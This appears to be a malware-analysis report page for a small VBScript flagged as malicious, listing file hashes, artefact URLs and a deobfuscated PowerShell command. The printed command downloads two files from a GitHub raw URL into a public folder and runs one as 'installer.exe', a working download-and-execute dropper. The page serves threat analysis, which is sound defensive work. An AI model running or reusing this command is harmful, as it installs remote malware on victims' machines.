Malicious
Malicious

a70f6a381ca6407f1539bdfd6ae8ec38

Share on LinkedIn Add to favorites
Re-Scan
Delete
VBScript
MD5: a70f6a381ca6407f1539bdfd6ae8ec38
Size: 791 B
text/vbscript
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
a70f6a381ca6407f1539bdfd6ae8ec38
Sha1
a523085c74e35e8df5ef7f18eaefbb6952bb8b66
Sha256
b57c3186303f4a56ac70699bdef1aede047db5a118370f93df0171d9d2add0d6
Sha384
76b69647f0c878f2c2b8a0f6efba321310d531acf3be406e87d59fe86d07cc3f9fca99d49e999c8355d444a0c32d24b4
Sha512
0fd15830d6ad6190527ba3856c42328d38eb2e8d65143839b9c6f23e19530d271768c9e70146b08186d32790b7f7febc59d00514d94ad30c1c79f92047d9846b
SSDeep
24:ynDmOMGvol0Q0MGvkf80KhRzp5mH5uTLmOD5uwXecT0VZ/qajWf:ki4oxH4ksft56vODhiG
TLSH
2B01D043F63B9A6FCD5176C99120535CEA828F9125038677BA9D4C0C4313D1743474CB
File Structure
a70f6a381ca6407f1539bdfd6ae8ec38
Malicious
a70f6a381ca6407f1539bdfd6ae8ec38.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
URLs in VB Code - #1

https://raw.githubusercontent.com/cabeto850128/comicsam/refs/heads/main/kiSBJ4DDvg.pif
URLs in VB Code - #2

https://raw.githubusercontent.com/cabeto850128/comicsam/refs/heads/main/CdBhhfa.html
Deobfuscated PowerShell

Invoke-WebRequest -Uri "https://raw.githubusercontent.com/cabeto850128/comicsam/refs/heads/main/kiSBJ4DDvg.pif" -OutFile "C:\Users\Public\Downloads\installer.exe" Invoke-WebRequest -Uri "https://raw.githubusercontent.com/cabeto850128/comicsam/refs/heads/main/CdBhhfa.html" -OutFile "C:\Users\Public\Downloads\config.data" Start-Process "C:\Users\Public\Downloads\installer.exe" -ArgumentList "C:\Users\Public\Downloads\config.data"
a70f6a381ca6407f1539bdfd6ae8ec38 (791 B)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙